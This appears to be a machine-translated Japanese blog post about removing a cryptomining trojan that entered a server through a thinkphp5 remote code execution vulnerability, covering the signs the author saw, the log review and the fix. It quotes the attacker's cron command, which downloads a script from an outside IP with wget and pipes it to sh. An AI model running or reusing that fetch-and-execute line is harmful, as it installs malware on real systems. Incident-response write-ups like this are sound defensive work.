トロイの木馬の駆除体験: thinkphp5 のリモート コード実行の脆弱性を悪用したトロイの木馬への対処

thinkphp の次のチュートリアル コラムでは、thinkphp5 のリモート コード実行の脆弱性を悪用するトロイの木馬に対処する方法を紹介します。

トロイの木馬を削除した経験を思い出してください: thinkphp5 のリモート コード実行の脆弱性を悪用したトロイの木馬に対処する

昨日、私は次のことを発見しました。サーバーが突然遅くなりました 上部は、いくつかのプロセスの CPU 使用率が 100% を超えていることを示しています

実行コマンドは:

/tmp/php  -s /tmp/p2.conf

基本的にハングしていることは確実です

次のステップはソースを特定することです

last ログイン レコードがありません

最初にこれらのプロセスを強制終了しますが、数分後に再び表示されます

内容を見てみましょうこのトロイの木馬が最初に実行したいことは、

netstat このトロイの木馬がポートを開いて、海外の特定の IP との接続を確立したことを参照してください

しかし、tcpdump はしばらくデータ転送を検出できませんでした

彼は何がしたかったのですか?

ログの確認を続けます

cron ログで、www ユーザーが crontab タイミング操作を行っていることがわかりました。これが基本的に問題です

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

いくつかの問題をダウンロードしましたこれはマイニング トロイの木馬プログラムのようです

サーバー上の www ユーザーは、lnmp をインストールすることによって作成されました。ソースを見ると、おそらく Web の脆弱性です。

/tmp の下にある php の権限を確認してください。www

lnmp の下にあるいくつかのサイトのログを確認すると、thinkphp 5

で最近明らかになったリモート コード実行の脆弱性が使用されていることがわかります。

脆弱性の詳細: https://nosec.org/home/detail/2050.html

問題を修正して解決してください

ただし、このサイトはテスト サイトであり、ポートがリッスンしています。は 8083 です。ハッカーが今、型破りなポートを盗聴し始められるでしょうか?

出典: https://www.simapple.com/425.html

関連する推奨事項:

最新の 10 件の thinkphp ビデオ チュートリアル

以上がトロイの木馬の駆除体験: thinkphp5 のリモート コード実行の脆弱性を悪用したトロイの木馬への対処の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。